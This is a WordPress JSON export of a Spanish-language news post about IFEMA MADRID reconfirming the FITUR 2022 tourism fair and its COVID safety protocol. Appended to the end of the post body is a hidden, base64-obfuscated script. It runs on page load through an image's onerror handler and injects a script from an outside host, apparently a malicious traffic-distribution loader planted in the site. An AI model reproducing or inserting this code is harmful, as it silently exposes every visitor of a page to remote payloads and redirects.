{"id":4975,"date":"2022-01-12T16:18:12","date_gmt":"2022-01-12T19:18:12","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4975"},"modified":"2025-08-13T16:24:06","modified_gmt":"2025-08-13T19:24:06","slug":"ifema-madrid-reconfirma-la-celebracion-de-fitur-2022-en-enero","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4975","title":{"rendered":"IFEMA MADRID reconfirma la celebraci\u00f3n de FITUR 2022 en enero"},"content":{"rendered":"\n<h5 class=\"wp-block-heading\">Gobierno de Espa\u00f1a, Comunidad de Madrid, Ayuntamiento de Madrid, Organizaci\u00f3n Mundial de Turismo, as\u00ed como el sector privado, avalan por unanimidad la celebraci\u00f3n en las fechas previstas de la Feria Internacional de Turismo \u00b7 IFEMA MADRID reforzar\u00e1 controles sanitarios y extremar\u00e1 todas las medidas que garanticen el desarrollo de FITUR en un recinto sanitariamente seguro \u00b7 La Feria acoger\u00e1 la presentaci\u00f3n del HELIXA Experience Center, instalaci\u00f3n tecnol\u00f3gico-art\u00edstica que, promovida por IFEMA MADRID, ofrecer\u00e1 como primicia a sus visitantes la generaci\u00f3n de su avatar, un gemelo digital personalizado hiperrealista 3D #seriezero en tiempo real con el que podr\u00e1 interactuar en plataformas digitales y en el metaverso<\/h5>\n\n\n\n<p><a>IFEMA MADRID&nbsp;<\/a>reconfirma las fechas de celebraci\u00f3n de la Feria Internacional de Turismo entre los d\u00edas 19 y 23 de enero. Una decisi\u00f3n que ha sido validada un\u00e1nimemente en una reuni\u00f3n convocada por el Presidente del Comit\u00e9 Ejecutivo de IFEMA, Jos\u00e9 Vicente de los Mozos, y en la que han participado la Ministra de Industria, Comercio y Turismo, Reyes Maroto; la Consejera de Cultura, Turismo y Deporte de la Comunidad de Madrid, Marta Rivera de la Cruz; el Secretario de Estado de Turismo, Fernando Vald\u00e9s; la Concejala Delegada de Turismo del Ayuntamiento de Madrid, Almudena Maillo; la Asesora del Secretario General de la OMT, Isabel Oliver,&nbsp; as\u00ed como el sector privado representado por el Presidente del Comit\u00e9 Organizador de FITUR y de IBERIA, Javier S\u00e1nchez-Prieto.<\/p>\n\n\n\n<p>Todos los actores presentes en este encuentro han coincidido en manifestar que \u201dla celebraci\u00f3n de FITUR es la mayor garant\u00eda de apoyo al sector del turismo en un momento cr\u00edtico para su total reactivaci\u00f3n y para recuperar los niveles de actividad y negocio previos a la pandemia. En enero, una vez m\u00e1s desde Espa\u00f1a y desde Madrid, lanzaremos una se\u00f1al esperanzadora e inequ\u00edvoca del potencial de una industria que necesita retomar la normalidad de una actividad que&nbsp; ha demostrado en estos \u00faltimos meses su gran fortaleza.\u201d<\/p>\n\n\n\n<p>En palabras del Presidente del Comit\u00e9 Ejecutivo de IFEMA MADRID, Jos\u00e9 Vicente de los Mozos, &nbsp;\u201ces importante la unanimidad que hemos alcanzado en una decisi\u00f3n de importante impacto en la dinamizaci\u00f3n de la actividad tur\u00edstica,&nbsp; con la garant\u00eda de organizar en un entorno sanitariamente seguro un gran evento que ya demostr\u00f3 su capacidad &nbsp;en la pasada edici\u00f3n y en una situaci\u00f3n m\u00e1s delicada. Esta edici\u00f3n de FITUR va a marcar un punto de inflexi\u00f3n en &nbsp;la actividad tur\u00edstica, &nbsp;y a\u00fan m\u00e1s&nbsp; en el arranque de un a\u00f1o en el que se han depositado grandes esperanzas para el &nbsp;despegue del negocio tur\u00edstico&nbsp; a nivel&nbsp; global.\u201d<\/p>\n\n\n\n<p>FITUR 2022 cuenta, adem\u00e1s, con el apoyo de toda la cadena de valor de la industria tur\u00edstica, como lo constata la alta representaci\u00f3n, nacional e internacional, y cifras que sit\u00faan a la feria en par\u00e1metros muy cercanos a los alcanzados antes de la pandemia. Se ocupar\u00e1n ocho pabellones del recinto ferial, donde estar\u00e1n representadas todas las Comunidades Aut\u00f3nomas, con una gran oferta de los destinos espa\u00f1oles, nuevas empresas, y una mayor presencia internacional. En total FITUR reunir\u00e1 alrededor de &nbsp;100 pa\u00edses con 70 representaciones oficiales, encabezados por la Rep\u00fablica Dominicana que este a\u00f1o es el Pa\u00eds Socio FITUR. &nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Riguroso protocolo de seguridad<\/strong><\/h2>\n\n\n\n<p>Para garantizar la normal celebraci\u00f3n de FITUR, IFEMA MADRID reforzar\u00e1 los controles sanitarios y extremar\u00e1 todas las medidas de seguridad. &nbsp;En este sentido, y en un contexto marcado por los altos niveles de vacunaci\u00f3n que registra Espa\u00f1a, FITUR 2022&nbsp;&nbsp; exigir\u00e1 a todos los participantes de pa\u00edses adscritos al certificado COVID digital europeo, su presentaci\u00f3n y, a participantes de terceros pa\u00edses, el mismo requisito solicitado en frontera para obtener el QR Spain Health que permite la entrada en Espa\u00f1a. &nbsp;<\/p>\n\n\n\n<p>Tambi\u00e9n volver\u00e1 a desplegar, como ya hizo en la edici\u00f3n de 2021, un riguroso protocolo de medidas y sistemas para garantizar la seguridad de todos los expositores y visitantes, que ser\u00e1 validado por la Consejer\u00eda de Sanidad de la Comunidad de Madrid. As\u00ed, &nbsp;llevar\u00e1 a cabo el control de aforos en todos los pabellones, con sistemas automatizados de conteo de personas, y con un sistema inteligente digital para el an\u00e1lisis de espacios, aforos y comportamiento de asistentes, controlando en todo momento las aglomeraciones, adem\u00e1s de exigir la obligatoriedad del uso de mascarilla en el interior de las instalaciones de IFEMA MADRID, y los controles de toma de temperatura que est\u00e1n implantados en todas sus ferias.<\/p>\n\n\n\n<p>Igualmente ser\u00e1 relevante la aplicaci\u00f3n de estrictos protocolos en el \u00e1mbito de la restauraci\u00f3n, con un amplio despliegue de espacios destinados a tal fin en los exteriores del recinto.<\/p>\n\n\n\n<p>A ello se suma la dotaci\u00f3n en las instalaciones de IFEMA MADRID de un avanzado y potente sistema de ventilaci\u00f3n que garantiza la eliminaci\u00f3n de la recirculaci\u00f3n del aire, &nbsp;su filtraci\u00f3n y &nbsp;completa renovaci\u00f3n cada 20 minutos, lo cual evita la propagaci\u00f3n de pat\u00f3genos.&nbsp; Medidas que se complementan con la organizaci\u00f3n de la circulaci\u00f3n de personas y la distribuci\u00f3n de espacios para garantizar la distancia de seguridad interpersonal; la distribuci\u00f3n de dispensadores de gel hidroalcoh\u00f3lico y desinfectantes por todo el recinto, y el uso de pases digitales para evitar contactos.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.ifema.es\/fitur\/noticias\/reconfirmacion-celebracion-enero-2022\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-1024x312.jpg\" alt=\"\" class=\"wp-image-4976\" width=\"192\" height=\"58\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-1024x312.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-300x92.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-768x234.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-1536x469.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-2048x625.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-696x212.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-1068x326.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/01\/logo-FITUR-1377x420.jpg 1377w\" sizes=\"(max-width: 192px) 100vw, 192px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Gobierno de Espa\u00f1a, Comunidad de Madrid, Ayuntamiento de Madrid, Organizaci\u00f3n Mundial de Turismo, as\u00ed como el sector privado, avalan por unanimidad la celebraci\u00f3n en las fechas previstas de la Feria Internacional de Turismo \u00b7 IFEMA MADRID reforzar\u00e1 controles sanitarios y extremar\u00e1 todas las medidas que garanticen el desarrollo de FITUR en un recinto sanitariamente seguro [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4977,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12,28,30],"tags":[],"class_list":["post-4975","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales","category-portales-de-servicios-e-informacion","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4975"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4975\/revisions"}],"predecessor-version":[{"id":10728,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4975\/revisions\/10728"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4977"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}